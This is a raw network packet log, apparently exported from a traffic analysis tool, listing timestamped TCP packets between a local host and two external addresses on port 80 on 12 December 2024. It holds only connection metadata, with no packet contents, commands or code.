                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.521888018 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.522150040 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.522171021 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.522229910 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.523353100 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.523469925 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.523547888 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.523643017 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.526319027 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.527338028 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.527359009 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.527642012 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.527895927 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.528150082 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.530242920 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.530431986 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.530715942 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.531342030 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.533226967 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.533855915 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.535351992 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.535912991 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.537301064 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.538682938 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.539335966 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.539413929 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.539638996 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.541380882 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.541491032 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.541503906 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.541539907 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.544019938 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.544503927 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.546659946 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.546822071 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.546885014 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.546885014 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.549149990 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.549215078 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.551659107 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.551717997 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.551815033 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.552720070 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.554229975 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.554335117 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.555530071 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.555707932 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.556754112 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.557015896 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.557034969 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.557132959 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.559247017 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.559336901 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.559984922 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.560060024 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.561692953 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.561698914 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.561949968 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.564404964 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.564558029 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.564595938 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.565512896 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.566569090 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.567337036 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.567714930 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.568205118 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.568792105 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.568881989 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.569107056 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.569264889 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.571187973 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.571324110 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.571357965 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.571491957 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.572235107 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.572496891 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.572618961 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.572715044 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.572876930 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.572969913 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.573539972 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.573635101 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.573707104 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.573713064 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.573719978 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.574088097 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.574727058 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.575017929 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.575046062 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.575103998 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.575763941 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.575849056 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.575854063 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.575939894 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.576026917 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.576029062 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.576061010 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.576752901 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.577550888 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.577651978 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.577790976 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.577797890 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.577914953 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.578265905 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.578272104 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.578850031 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.578860998 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.578963041 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.579349041 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.579857111 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.580634117 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.580640078 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.580651999 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.580754042 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.580764055 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.581252098 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.581837893 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.581938028 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.582237959 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.582253933 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.582328081 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.582963943 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.582969904 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.583024025 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.583029985 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.583076000 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.583121061 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.583976984 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.584268093 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.584873915 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.584980965 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.585005999 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.585357904 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.585364103 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.585458040 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.585937977 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.585943937 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.586411953 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.586486101 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.587006092 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.587011099 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.587099075 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.587802887 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.587807894 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.588001013 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.588001966 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.588006020 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.588229895 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.589020967 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.589205027 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.590003014 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.590060949 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.590066910 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.590104103 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.590106010 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.590141058 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.591056108 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.591104031 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.591227055 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.591424942 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.591994047 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.592242002 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.592346907 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.592612982 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.592639923 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.592762947 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.593261957 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.593822956 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.594115019 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.594260931 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.594346046 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.594898939 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.594993114 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.595036983 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.595046997 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.595134974 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.595135927 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.596107960 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.596333981 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.596443892 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.597187042 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.597282887 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.597287893 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.597383022 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.597383022 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.597383022 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.597546101 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.598226070 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.598319054 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.599350929 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.599452019 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.599487066 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.599556923 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.599845886 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.599914074 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.599978924 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.600133896 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.600507975 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.601012945 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.601713896 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.601808071 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.602731943 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.602740049 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.602859974 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.602936029 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.602956057 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.602957010 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.603039026 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.603091002 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.604072094 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.604497910 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.604625940 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.604995966 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.605137110 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.605142117 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.605153084 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.605310917 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.605314016 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.606199980 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.606515884 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.607089043 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.607196093 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.607358932 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.607578993 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.607584000 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.607637882 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.607673883 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.607986927 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.608968019 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.609060049 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.609278917 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.609366894 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.609455109 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.610091925 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.610311031 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.610321045 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.610327005 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.610425949 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.610425949 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.610426903 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.611157894 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.611260891 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.611454964 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.612246990 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.612255096 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.612363100 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.612375975 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.612467051 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.612468958 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.613158941 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.613749027 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.614358902 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.614366055 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.614471912 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.614923954 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.614929914 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.615063906 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:46.615705013 CET8049946185.81.68.147192.168.2.10
